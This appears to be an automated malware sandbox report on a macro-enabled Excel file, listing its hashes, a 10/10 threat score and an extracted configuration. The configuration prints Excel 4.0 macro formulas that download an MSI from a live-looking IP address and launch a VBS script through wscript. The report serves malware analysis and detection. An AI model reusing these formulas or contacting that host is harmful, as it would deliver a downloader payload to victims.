General
-
Target
1c959fa7cc8a7558dea798033c44a279
-
Size
6KB
-
Sample
231221-2v7vtsfhgn
-
MD5
1c959fa7cc8a7558dea798033c44a279
-
SHA1
22c07d1124dffb65e20a94cf1d79b7e1e4883e75
-
SHA256
0d4c43a954f7a7aec20289956f4333c3d59a15697cedb0872f2fca4a6cb2236b
-
SHA512
af19620066d2e0be64149960446e0ce8889dabcbc13d49c5b0541b57997306faeb917cfea7dfb1fadfc59851269c0ffb639e14c0e12e21a0de9b9f3a48a79585
-
SSDEEP
192:NDSduSrbrA2OmmfRW8UhHFBFYuwb98y+v+ovc:NGuwM2wQ1FYhb98y+H0
Static task
static1
Behavioral task
behavioral1
Sample
1c959fa7cc8a7558dea798033c44a279.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1c959fa7cc8a7558dea798033c44a279.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
1c959fa7cc8a7558dea798033c44a279
-
Size
6KB
-
MD5
1c959fa7cc8a7558dea798033c44a279
-
SHA1
22c07d1124dffb65e20a94cf1d79b7e1e4883e75
-
SHA256
0d4c43a954f7a7aec20289956f4333c3d59a15697cedb0872f2fca4a6cb2236b
-
SHA512
af19620066d2e0be64149960446e0ce8889dabcbc13d49c5b0541b57997306faeb917cfea7dfb1fadfc59851269c0ffb639e14c0e12e21a0de9b9f3a48a79585
-
SSDEEP
192:NDSduSrbrA2OmmfRW8UhHFBFYuwb98y+v+ovc:NGuwM2wQ1FYhb98y+H0
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-